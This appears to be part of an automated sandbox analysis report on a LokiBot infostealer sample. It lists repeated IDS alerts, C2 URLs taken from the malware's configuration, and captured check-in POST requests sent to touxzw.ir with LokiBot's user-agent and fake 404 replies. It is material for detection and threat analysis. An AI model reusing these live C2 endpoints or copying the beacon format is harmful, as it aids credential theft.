Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50094 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50094 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50091 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50084 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50093 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50085 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50085 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50094 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50085 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50085 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50087 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50086 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50093 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50086 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50083 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50083 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50083 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50092 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50088 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50091 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50083 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50079 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50094 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50084 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50093 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50086 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50091 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50084 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50093 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50082
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50091 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50090 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50090 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50090 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50087 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50087 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50090 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50089
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50085
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50092 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50087 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50079 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50079 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50001
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50079 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50086
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50093
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50088
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50094
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50092 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50091
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50092 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49974 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50087
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49974 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49974 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49974 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50090
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50095 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50095 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50092
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50083
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50095 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50095 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49974

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00404ED4 recv,

8_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBWMTqGHHYaBB9ruLDzhk4zNbNahxqqmfb5LhTMEUTKWu%2BLt1ZCyqVpOcd6rGbXHZb%2FersuMAkkVGKhT90bbOajZR2Twjyjcd5CrckzvVULzaOsk6RSQ%2FXPWvMM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3619fe2c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1511&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8g4k8DxJyUwYqeAGfTPo351XFAkb45bnl5QqusGPeOBsykvzSjE49Z7aSv6aDSaA3UMSw7J%2FfmX5szBjbW3t3BNbFeegxax2SEWl0XoQFyPEfNQNW1RBKVIB6k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec37ffaad0f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1850&rtt_var=925&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
